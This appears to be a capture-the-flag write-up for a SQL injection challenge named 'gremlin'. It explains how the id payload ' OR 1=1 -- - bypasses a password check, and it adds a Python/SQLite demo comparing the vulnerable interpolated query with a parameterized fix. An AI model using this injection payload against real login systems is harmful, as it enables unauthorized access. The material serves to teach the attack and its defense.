
gremlin


We are provided with the SQL query:

```sql
SELECT id FROM prob_gremlin WHERE id='{$_GET[id]}' AND pw='{$_GET[pw]}'
```

To make the `WHERE` clause of this query evaluate to true, we can supply the following URI parameter:

```
?id=' OR 1=1 -- -
```

The resulting query then becomes:

```sql
SELECT id FROM prob_gremlin WHERE id='' OR 1=1 -- -' AND pw=''
```

## Queried part:

```sql
SELECT id FROM prob_gremlin WHERE id='' OR 1=1
```

## Commented part:

```sql
AND pw=''
```

Since `1=1` is always true, the `OR` condition is always true, so the `WHERE` clause matches every row regardless of the `pw` value; the `-- -` comment discards the rest of the original query.
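As an added example that is not part of the original writeup, the interpolated query above is reproduced in Python against an in-memory SQLite table, beside the parameterized form that keeps the same payload from changing the query's structure. The table rows, the placeholder password and the function names are constructed for this demo, not taken from the challenge.

```python
import sqlite3

PAYLOAD = "' OR 1=1 -- -"  # the id parameter from the writeup above


def make_db():
    # Constructed stand-in for the challenge table (sample rows, not the site's data).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE prob_gremlin (id TEXT, pw TEXT)")
    conn.executemany(
        "INSERT INTO prob_gremlin VALUES (?, ?)",
        [("admin", "placeholder-admin-pw"), ("guest", "guest")],
    )
    return conn


def login_interpolated(conn, id_, pw):
    # Mirrors the page's PHP query: user input is spliced into the SQL text,
    # so a quote in id_ closes the literal and "-- -" comments out the pw check.
    query = f"SELECT id FROM prob_gremlin WHERE id='{id_}' AND pw='{pw}'"
    return [row[0] for row in conn.execute(query)]


def login_parameterized(conn, id_, pw):
    # Hardened form: bound parameters are passed as data, never parsed as SQL,
    # so the payload is compared literally against the id column and matches nothing.
    query = "SELECT id FROM prob_gremlin WHERE id=? AND pw=?"
    return [row[0] for row in conn.execute(query, (id_, pw))]


def demo():
    conn = make_db()
    return {
        "interpolated": login_interpolated(conn, PAYLOAD, ""),    # every row
        "parameterized": login_parameterized(conn, PAYLOAD, ""),  # no rows
        "legit": login_parameterized(conn, "guest", "guest"),     # ['guest']
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```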
